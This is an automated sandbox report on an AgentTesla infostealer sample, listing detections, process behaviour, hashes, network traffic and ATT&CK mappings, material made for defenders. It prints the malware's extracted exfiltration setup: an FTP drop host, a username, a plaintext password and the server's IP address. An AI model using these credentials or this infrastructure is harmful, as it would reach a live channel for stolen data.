Windows
Analysis Report
MACHINE SPECIFICATIONS.exe
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- MACHINE SPECIFICATIONS.exe (PID: 6128, cmdline: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe, MD5: 92945D0A2731EF771EA9D10C792E03E1)
  - CasPol.exe (PID: 688, cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, MD5: F866FC1C2E928779C7119353C3091F0C)
- newapp.exe (PID: 4272, cmdline: "C:\Users\user\AppData\Roaming\newapp\newapp.exe", MD5: F866FC1C2E928779C7119353C3091F0C)
  - conhost.exe (PID: 4764, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- newapp.exe (PID: 676, cmdline: "C:\Users\user\AppData\Roaming\newapp\newapp.exe", MD5: F866FC1C2E928779C7119353C3091F0C)
  - conhost.exe (PID: 6132, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- cleanup
{"Exfil Mode": "FTP", "FTP Host": "ftp://ftp.electrobist.com", "Username": "user1@electrobist.com", "Password": "w&oNc9e]pf~4"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
 | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | |
 | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security | |
 | Windows_Trojan_AgentTesla_d3ac2b2f | unknown | unknown | |
 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | |
 | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
 | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | |
 | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security | |
 | MALWARE_Win_AgentTeslaV3 | AgentTeslaV3 infostealer payload | ditekSHen | |
 | Windows_Trojan_AgentTesla_d3ac2b2f | unknown | unknown | |
Timestamp | Source IP | Source Port | Destination IP | Destination Port | Protocol | SID | Classtype |
---|---|---|---|---|---|---|---|
11/29/22-11:20:12.397759 | 192.168.2.3 | 49702 | 51.195.62.160 | 21 | TCP | 2029927 | A Network Trojan was detected |
11/29/22-11:20:12.420526 | 192.168.2.3 | 49703 | 51.195.62.160 | 52259 | TCP | 2851779 | A Network Trojan was detected |
AV Detection
Source | Entries |
---|---|
Virustotal | 1 |
ReversingLabs | 1 |
Avira URL Cloud | 1 |
Joe Sandbox ML | 1 |
Avira | 1 |
Malware Configuration Extractor | 1 |
HTTPS traffic detected | 1 |
Static PE information | 1 |
Binary string | 3 |
Networking
Source | Entries |
---|---|
Snort IDS | 2 |
DNS query | 6 |
ASN Name | 1 |
JA3 fingerprint | 1 |
IP Address | 3 |
HTTP traffic detected | 1 |
TCP traffic | 1 |
FTP traffic detected | 1 |
Network traffic detected | 2 |
String found in binary or memory | 11 |
DNS traffic detected | 1 |
HTTP traffic detected | 1 |
HTTPS traffic detected | 1 |
Key, Mouse, Clipboard, Microphone and Screen Capturing
Source | Entries |
---|---|
Windows user hook set | 1 |
Window created | 1 |
System Summary
Source | Entries | Details |
---|---|---|
Matched rule | 4 | |
Large array initialization | 1 | |
Matched rule | 4 | |
Code function | 29 | 10_2_023FFC48, 10_2_023F6D20, 10_2_05DF9708, 10_2_05DFF2A0, 10_2_05DFBE50, 10_2_05DFB4E0, 10_2_05DF84B8, 10_2_05DF8408, 10_2_05DFD9A8, 10_2_05E90480, 10_2_05E92170, 10_2_05E9BC40, 10_2_05E95F40, 10_2_05E929C8, 10_2_05E92020, 10_2_05E9CA68, 10_2_05EE3D4C, 10_2_05EE372C, 10_2_05EE5668, 10_2_05EEC1E0, 10_2_05EE0040, 10_2_05EEC054, 10_2_05EE33E4, 10_2_05EED3A0, 10_2_05EE8B28, 10_2_05EE3730, 10_2_05E93958, 11_2_01130958, 13_2_00C00958 |
Static PE information | 1 | |
Binary or memory string | 1 | |
Dropped File | 1 | |
Static PE information | 1 | |
Virustotal | 1 | |
ReversingLabs | 1 | |
Static PE information | 1 | |
Key opened | 1 | |
Process created | 7 | |
Key value queried | 1 | |
WMI Queries | 2 | |
File created | 2 | |
Classification label | 1 | |
Security API names | 4 | |
Section loaded | 4 | |
Mutant created | 2 | |
Cryptographic APIs | 3 | |
File read | 4 | |
File opened | 1 | |
Key opened | 1 | |
Static PE information | 3 | |
Binary string | 3 | |
Code function | 5 | 10_2_05DFE705, 10_2_05DF9C85, 10_2_05DF2A49, 10_2_05E951D5, 10_2_05E95225 |
Static PE information | 1 | |
File created (dropped file) | 1 | |
Registry value created or modified | 2 | |
Hooking and other Techniques for Hiding and Protection
Source | Entries |
---|---|
Icon embedded in binary file | 1 |
File opened | 1 |
Process information set | 108 |
Malware Analysis System Evasion
Source | Entries | Details |
---|---|---|
WMI Queries | 2 | |
Thread sleep count | 1 | |
Thread sleep time | 2 | |
Thread sleep count | 1 | |
Thread sleep time | 2 | |
Last function | 2 | |
Thread delayed | 4 | |
Window / User API | 1 | |
WMI Queries | 2 | |
Process information queried | 1 | |
Thread delayed | 4 | |
Binary or memory string | 1 | |
Process token adjusted | 1 | |
Code function | 1 | 10_2_05DF7BF0 |
Memory allocated | 1 | |
HIPS / PFW / Operating System Protection Evasion
Source | Entries |
---|---|
Memory written | 5 |
Reference to suspicious API methods | 3 |
Memory written | 1 |
Process created | 1 |
Queries volume information | 12 |
Key value queried | 1 |
Stealing of Sensitive Information
Source | Entries |
---|---|
File source | 4 |
File opened | 2 |
Key opened | 2 |
Key opened | 1 |
File opened | 2 |
File opened | 2 |
File source | 3 |
Remote Access Functionality
Source | Entries |
---|---|
File source | 4 |
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | 211 Windows Management Instrumentation | 1 Registry Run Keys / Startup Folder | 211 Process Injection | 1 Disable or Modify Tools | 2 OS Credential Dumping | 114 System Information Discovery | Remote Services | 11 Archive Collected Data | 1 Exfiltration Over Alternative Protocol | 1 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 1 Registry Run Keys / Startup Folder | 1 Deobfuscate/Decode Files or Information | 11 Input Capture | 111 Security Software Discovery | Remote Desktop Protocol | 2 Data from Local System | Exfiltration Over Bluetooth | 11 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 2 Obfuscated Files or Information | 1 Credentials in Registry | 1 Process Discovery | SMB/Windows Admin Shares | 1 Email Collection | Automated Exfiltration | 1 Non-Standard Port | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 3 Software Packing | NTDS | 131 Virtualization/Sandbox Evasion | Distributed Component Object Model | 11 Input Capture | Scheduled Transfer | 2 Non-Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 11 Masquerading | LSA Secrets | 1 Application Window Discovery | SSH | 1 Clipboard Data | Data Transfer Size Limits | 23 Application Layer Protocol | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 131 Virtualization/Sandbox Evasion | Cached Domain Credentials | 1 Remote System Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | 211 Process Injection | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 Hidden Files and Directories | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |
Source | Detection | Scanner | Label |
---|---|---|---|
 | 59% | Virustotal | |
 | 73% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla |
 | 100% | Joe Sandbox ML | |
Source | Detection | Scanner | Label |
---|---|---|---|
 | 0% | ReversingLabs | |
Source | Detection | Scanner | Label |
---|---|---|---|
 | 100% | Avira | TR/Spy.Gen8 |
Source | Detection | Scanner | Label |
---|---|---|---|
 | 0% | Virustotal | |
 | 0% | Virustotal | |
 | 1% | Virustotal | |
Source | Detection | Scanner | Label |
---|---|---|---|
 | 0% | URL Reputation | safe |
 | 0% | URL Reputation | safe |
 | 0% | Avira URL Cloud | safe |
 | 0% | Avira URL Cloud | safe |
 | 0% | Avira URL Cloud | safe |
 | 100% | Avira URL Cloud | malware |
 | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
api.ipify.org.herokudns.com | 3.220.57.224 | true | false | | unknown |
c-0001.c-msedge.net | 13.107.4.50 | true | false | | unknown |
ftp.electrobist.com | 51.195.62.160 | true | true | | unknown |
api.ipify.org | unknown | unknown | false | | high |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
 | false | | high |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
 | | false | | low |
 | | false | | high |
 | | false | | unknown |
 | | false | | unknown |
 | | false | | unknown |
 | | false | | high |
 | | false | | unknown |
 | | false | | unknown |
 | | false | | unknown |
IP | Domain | Country | ASN | ASN Name | Malicious |
---|---|---|---|---|---|
51.195.62.160 | ftp.electrobist.com | France | 16276 | OVHFR | true |
3.220.57.224 | api.ipify.org.herokudns.com | United States | 14618 | AMAZON-AESUS | false |
IP |
---|
192.168.2.1 |
Joe Sandbox Version: | 36.0.0 Rainbow Opal |
Analysis ID: | 755960 |
Start date and time: | 2022-11-29 11:18:06 +01:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 9m 46s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | MACHINE SPECIFICATIONS.exe |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of analysed new started processes analysed: | 20 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: | |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.troj.spyw.evad.winEXE@7/5@3/3 |
EGA Information: | |
HDC Information: | Failed |
HCA Information: | |
Cookbook Comments: | |
- Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 67.27.158.254, 8.248.135.254, 8.241.123.126, 8.248.143.254, 67.27.157.254
- Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, fs.microsoft.com, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net
- Execution Graph export aborted for target newapp.exe, PID 4272 because it is empty
- Execution Graph export aborted for target newapp.exe, PID 676 because it is empty
- Not all processes were analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtAllocateVirtualMemory calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
11:19:57 | Autostart | |
11:20:05 | Autostart | |
11:20:12 | API Interceptor |
Match | Related samples listed | Detection |
---|---|---|
51.195.62.160 | 1 | malicious |
3.220.57.224 | 20 | malicious |
Match | Related samples listed | Detection |
---|---|---|
api.ipify.org.herokudns.com | 20 | malicious |
c-0001.c-msedge.net | 20 | malicious |
Match | Related samples listed | Detection |
---|---|---|
AMAZON-AESUS | 20 | malicious |
OVHFR | 20 | malicious |
Match | Related samples listed | Detection |
---|---|---|
3b5074b1b5d032e5620f69f9f700ff0e | 20 | malicious |
Match | Related samples listed | Detection |
---|---|---|
C:\Users\user\AppData\Roaming\newapp\newapp.exe | 20 | malicious |
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\MACHINE SPECIFICATIONS.exe.log
Download File
Process: | C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 654 |
Entropy (8bit): | 5.374391981354885 |
Encrypted: | false |
SSDEEP: | 12:Q3La/KDLI4MWuPTxAIOKbbDLI4MWuPOKN08JOKhap+92n4MNQpN9tv:ML9E4KrgKDE4KGKN08AKh6+84xpNT |
MD5: | C8A62E39DE7A3F805D39384E8BABB1E0 |
SHA1: | B32B1257401F17A2D1D5D3CC1D8C1E072E3FEE31 |
SHA-256: | A7BC127854C5327ABD50C86000BF10586B556A5E085BB23523B07A15DD4C5383 |
SHA-512: | 7DB2825131F5CDA6AF33A179D9F7CD0A206FF34AE50D6E66DE9E99BE2CD1CB985B88C00F0EDE72BBC4467E7E42B5DC6132403AA2EC1A0A7A6D11766C438B10C3 |
Malicious: | true |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Users\user\AppData\Roaming\newapp\newapp.exe |
File Type: | |
Category: | modified |
Size (bytes): | 42 |
Entropy (8bit): | 4.0050635535766075 |
Encrypted: | false |
SSDEEP: | 3:QHXMKa/xwwUy:Q3La/xwQ |
MD5: | 84CFDB4B995B1DBF543B26B86C863ADC |
SHA1: | D2F47764908BF30036CF8248B9FF5541E2711FA2 |
SHA-256: | D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B |
SHA-512: | 485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 107624 |
Entropy (8bit): | 5.882571203162287 |
Encrypted: | false |
SSDEEP: | 1536:oSF7vA1hRqHixxMjlI34j8p2mdc/6A4vW/CU1RPMRVQJE:/A1hDPMip2mdcyA4vW/JRPMLQW |
MD5: | F866FC1C2E928779C7119353C3091F0C |
SHA1: | 70D06064E2F12CFB10A82BC985F86F58EA7A4138 |
SHA-256: | 67F3FC243C58EEAE55BDDC22CE025B7841A89ACA2E201B999D8C0E4F07D177B8 |
SHA-512: | B28B10801580726B85AB5F796EA26835648A3ACFBE1FBA95DFC687439B43FF9548BD3AB9EFC85D88FC071D232718BCFFAC614CC5BFF159173996A3D2AB22154D |
Malicious: | true |
Antivirus: |
Joe Sandbox View: |
Preview: |
Process: | C:\Users\user\AppData\Roaming\newapp\newapp.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 486 |
Entropy (8bit): | 5.064987733454706 |
Encrypted: | false |
SSDEEP: | 12:z30U30b4BFNY8fNFquci7S1pE+DPOCN6+QOH5JyY:z3F3g4DO4UE+Tz5JB |
MD5: | 30394F72BB157162F35A2DEB1F48BD1A |
SHA1: | 66AD7D748F42C64E0698606A8F019D165DE657E8 |
SHA-256: | 133FABF0CD558FA3E5144E9EF35654FA0422F8424C6D5D82828B8D10EC9BA295 |
SHA-512: | A93E12D6C9927403FE0E20B8A698B24007EBCCD53A29AD65428366C6CE3CED05E5F3AEFF1D46C7D9F174EAEAE5059F0B5D12353B6022965CDC5D187E45FA72E9 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 7.979738488629949 |
TrID: |
File name: | MACHINE SPECIFICATIONS.exe |
File size: | 523776 |
MD5: | 92945d0a2731ef771ea9d10c792e03e1 |
SHA1: | 1eeef600b7b51ce7aa93e825be55b40f3ef8e319 |
SHA256: | 46b61250c34b38d26ac5897217e6b70a222ff16318161c4e67c74c74491cc612 |
SHA512: | 33ff6835de8b3a4a0002669deb68acf14a770e7546c2250eb6cdcde2ad4841891f504faa77427e864d1b7758481864189039beb8ec9d926f5804bd7da30a5fb2 |
SSDEEP: | 12288:BxNQOgJk4hl4vPE1suvqvku873X9BsILNILZoRPzre:BxNi6MlzX9BsILNILZoFre |
TLSH: | F7B4235560BB2097E21682344A275FA211E4AE2325E6BD4FE3DCBD0F5F732402E39766 |
File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...$..c.........."...0......B........... ....@...... .......................@............`................................ |
Icon Hash: | c49a0894909c6494 |
Entrypoint: | 0x400000 |
Entrypoint Section: | |
Digitally signed: | false |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE |
DLL Characteristics: | HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE |
Time Stamp: | 0x63800824 [Fri Nov 25 00:11:16 2022 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 4 |
OS Version Minor: | 0 |
File Version Major: | 4 |
File Version Minor: | 0 |
Subsystem Version Major: | 4 |
Subsystem Version Minor: | 0 |
Import Hash: |
Instruction |
---|
dec ebp |
pop edx |
nop |
add byte ptr [ebx], al |
add byte ptr [eax], al |
add byte ptr [eax+eax], al |
add byte ptr [eax], al |
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x7e000 | 0x40a0 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x7d864 | 0x1c | .text |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2000 | 0x48 | .text |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|
.text | 0x2000 | 0x7b8d3 | 0x7ba00 | False | 0.9942492416582407 | data | 7.996815914318105 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.rsrc | 0x7e000 | 0x40a0 | 0x4200 | False | 0.4485677083333333 | data | 5.797210494950491 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country |
---|---|---|---|---|---|
RT_ICON | 0x7e190 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | ||
RT_ICON | 0x7e5f8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | ||
RT_ICON | 0x7f6a0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | ||
RT_GROUP_ICON | 0x81c48 | 0x30 | data | ||
RT_VERSION | 0x81c78 | 0x23c | data | ||
RT_MANIFEST | 0x81eb4 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
11/29/22-11:20:12.397759 | TCP | 2029927 | ET TROJAN AgentTesla Exfil via FTP | 49702 | 21 | 192.168.2.3 | 51.195.62.160 |
11/29/22-11:20:12.420526 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49703 | 52259 | 192.168.2.3 | 51.195.62.160 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Nov 29, 2022 11:19:53.759691000 CET | 49701 | 443 | 192.168.2.3 | 3.220.57.224 |
Nov 29, 2022 11:19:53.759767056 CET | 443 | 49701 | 3.220.57.224 | 192.168.2.3 |
Nov 29, 2022 11:19:53.759933949 CET | 49701 | 443 | 192.168.2.3 | 3.220.57.224 |
Nov 29, 2022 11:19:53.807363987 CET | 49701 | 443 | 192.168.2.3 | 3.220.57.224 |
Nov 29, 2022 11:19:53.807424068 CET | 443 | 49701 | 3.220.57.224 | 192.168.2.3 |
Nov 29, 2022 11:19:54.121747017 CET | 443 | 49701 | 3.220.57.224 | 192.168.2.3 |
Nov 29, 2022 11:19:54.122018099 CET | 49701 | 443 | 192.168.2.3 | 3.220.57.224 |
Nov 29, 2022 11:19:54.132211924 CET | 49701 | 443 | 192.168.2.3 | 3.220.57.224 |
Nov 29, 2022 11:19:54.132246971 CET | 443 | 49701 | 3.220.57.224 | 192.168.2.3 |
Nov 29, 2022 11:19:54.132662058 CET | 443 | 49701 | 3.220.57.224 | 192.168.2.3 |
Nov 29, 2022 11:19:54.338932991 CET | 443 | 49701 | 3.220.57.224 | 192.168.2.3 |
Nov 29, 2022 11:19:54.339055061 CET | 49701 | 443 | 192.168.2.3 | 3.220.57.224 |
Nov 29, 2022 11:19:54.616307974 CET | 49701 | 443 | 192.168.2.3 | 3.220.57.224 |
Nov 29, 2022 11:19:54.616383076 CET | 443 | 49701 | 3.220.57.224 | 192.168.2.3 |
Nov 29, 2022 11:19:54.763174057 CET | 443 | 49701 | 3.220.57.224 | 192.168.2.3 |
Nov 29, 2022 11:19:54.763329983 CET | 443 | 49701 | 3.220.57.224 | 192.168.2.3 |
Nov 29, 2022 11:19:54.763463974 CET | 49701 | 443 | 192.168.2.3 | 3.220.57.224 |
Nov 29, 2022 11:19:54.767330885 CET | 49701 | 443 | 192.168.2.3 | 3.220.57.224 |
Nov 29, 2022 11:20:12.212491989 CET | 49702 | 21 | 192.168.2.3 | 51.195.62.160 |
Nov 29, 2022 11:20:12.231043100 CET | 21 | 49702 | 51.195.62.160 | 192.168.2.3 |
Nov 29, 2022 11:20:12.231232882 CET | 49702 | 21 | 192.168.2.3 | 51.195.62.160 |
Nov 29, 2022 11:20:12.250191927 CET | 21 | 49702 | 51.195.62.160 | 192.168.2.3 |
Nov 29, 2022 11:20:12.250646114 CET | 49702 | 21 | 192.168.2.3 | 51.195.62.160 |
Nov 29, 2022 11:20:12.269145012 CET | 21 | 49702 | 51.195.62.160 | 192.168.2.3 |
Nov 29, 2022 11:20:12.269206047 CET | 21 | 49702 | 51.195.62.160 | 192.168.2.3 |
Nov 29, 2022 11:20:12.269444942 CET | 49702 | 21 | 192.168.2.3 | 51.195.62.160 |
Nov 29, 2022 11:20:12.296277046 CET | 21 | 49702 | 51.195.62.160 | 192.168.2.3 |
Nov 29, 2022 11:20:12.296541929 CET | 49702 | 21 | 192.168.2.3 | 51.195.62.160 |
Nov 29, 2022 11:20:12.314970016 CET | 21 | 49702 | 51.195.62.160 | 192.168.2.3 |
Nov 29, 2022 11:20:12.315330029 CET | 49702 | 21 | 192.168.2.3 | 51.195.62.160 |
Nov 29, 2022 11:20:12.333745003 CET | 21 | 49702 | 51.195.62.160 | 192.168.2.3 |
Nov 29, 2022 11:20:12.334007978 CET | 49702 | 21 | 192.168.2.3 | 51.195.62.160 |
Nov 29, 2022 11:20:12.352402925 CET | 21 | 49702 | 51.195.62.160 | 192.168.2.3 |
Nov 29, 2022 11:20:12.354644060 CET | 49702 | 21 | 192.168.2.3 | 51.195.62.160 |
Nov 29, 2022 11:20:12.373279095 CET | 21 | 49702 | 51.195.62.160 | 192.168.2.3 |
Nov 29, 2022 11:20:12.378772974 CET | 49703 | 52259 | 192.168.2.3 | 51.195.62.160 |
Nov 29, 2022 11:20:12.397347927 CET | 52259 | 49703 | 51.195.62.160 | 192.168.2.3 |
Nov 29, 2022 11:20:12.397562027 CET | 49703 | 52259 | 192.168.2.3 | 51.195.62.160 |
Nov 29, 2022 11:20:12.397758961 CET | 49702 | 21 | 192.168.2.3 | 51.195.62.160 |
Nov 29, 2022 11:20:12.416052103 CET | 21 | 49702 | 51.195.62.160 | 192.168.2.3 |
Nov 29, 2022 11:20:12.420526028 CET | 49703 | 52259 | 192.168.2.3 | 51.195.62.160 |
Nov 29, 2022 11:20:12.420638084 CET | 49703 | 52259 | 192.168.2.3 | 51.195.62.160 |
Nov 29, 2022 11:20:12.438709974 CET | 52259 | 49703 | 51.195.62.160 | 192.168.2.3 |
Nov 29, 2022 11:20:12.438776970 CET | 52259 | 49703 | 51.195.62.160 | 192.168.2.3 |
Nov 29, 2022 11:20:12.438832998 CET | 21 | 49702 | 51.195.62.160 | 192.168.2.3 |
Nov 29, 2022 11:20:12.438872099 CET | 49703 | 52259 | 192.168.2.3 | 51.195.62.160 |
Nov 29, 2022 11:20:12.438963890 CET | 49702 | 21 | 192.168.2.3 | 51.195.62.160 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Nov 29, 2022 11:19:53.677805901 CET | 57990 | 53 | 192.168.2.3 | 8.8.8.8 |
Nov 29, 2022 11:19:53.695560932 CET | 53 | 57990 | 8.8.8.8 | 192.168.2.3 |
Nov 29, 2022 11:19:53.711530924 CET | 52387 | 53 | 192.168.2.3 | 8.8.8.8 |
Nov 29, 2022 11:19:53.730598927 CET | 53 | 52387 | 8.8.8.8 | 192.168.2.3 |
Nov 29, 2022 11:20:12.084580898 CET | 56924 | 53 | 192.168.2.3 | 8.8.8.8 |
Nov 29, 2022 11:20:12.209414005 CET | 53 | 56924 | 8.8.8.8 | 192.168.2.3 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Nov 29, 2022 11:19:53.677805901 CET | 192.168.2.3 | 8.8.8.8 | 0xfd66 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 29, 2022 11:19:53.711530924 CET | 192.168.2.3 | 8.8.8.8 | 0x6f4 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 29, 2022 11:20:12.084580898 CET | 192.168.2.3 | 8.8.8.8 | 0xa066 | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Nov 29, 2022 11:18:50.334419966 CET | 8.8.8.8 | 192.168.2.3 | 0xd9b5 | No error (0) | c-0001.c-msedge.net | CNAME (Canonical name) | IN (0x0001) | false | ||
Nov 29, 2022 11:18:50.334419966 CET | 8.8.8.8 | 192.168.2.3 | 0xd9b5 | No error (0) | 13.107.4.50 | A (IP address) | IN (0x0001) | false | ||
Nov 29, 2022 11:19:53.695560932 CET | 8.8.8.8 | 192.168.2.3 | 0xfd66 | No error (0) | api.ipify.org.herokudns.com | CNAME (Canonical name) | IN (0x0001) | false | ||
Nov 29, 2022 11:19:53.695560932 CET | 8.8.8.8 | 192.168.2.3 | 0xfd66 | No error (0) | 3.220.57.224 | A (IP address) | IN (0x0001) | false | ||
Nov 29, 2022 11:19:53.695560932 CET | 8.8.8.8 | 192.168.2.3 | 0xfd66 | No error (0) | 52.20.78.240 | A (IP address) | IN (0x0001) | false | ||
Nov 29, 2022 11:19:53.695560932 CET | 8.8.8.8 | 192.168.2.3 | 0xfd66 | No error (0) | 3.232.242.170 | A (IP address) | IN (0x0001) | false | ||
Nov 29, 2022 11:19:53.695560932 CET | 8.8.8.8 | 192.168.2.3 | 0xfd66 | No error (0) | 54.91.59.199 | A (IP address) | IN (0x0001) | false | ||
Nov 29, 2022 11:19:53.730598927 CET | 8.8.8.8 | 192.168.2.3 | 0x6f4 | No error (0) | api.ipify.org.herokudns.com | CNAME (Canonical name) | IN (0x0001) | false | ||
Nov 29, 2022 11:19:53.730598927 CET | 8.8.8.8 | 192.168.2.3 | 0x6f4 | No error (0) | 54.91.59.199 | A (IP address) | IN (0x0001) | false | ||
Nov 29, 2022 11:19:53.730598927 CET | 8.8.8.8 | 192.168.2.3 | 0x6f4 | No error (0) | 3.220.57.224 | A (IP address) | IN (0x0001) | false | ||
Nov 29, 2022 11:19:53.730598927 CET | 8.8.8.8 | 192.168.2.3 | 0x6f4 | No error (0) | 3.232.242.170 | A (IP address) | IN (0x0001) | false | ||
Nov 29, 2022 11:19:53.730598927 CET | 8.8.8.8 | 192.168.2.3 | 0x6f4 | No error (0) | 52.20.78.240 | A (IP address) | IN (0x0001) | false | ||
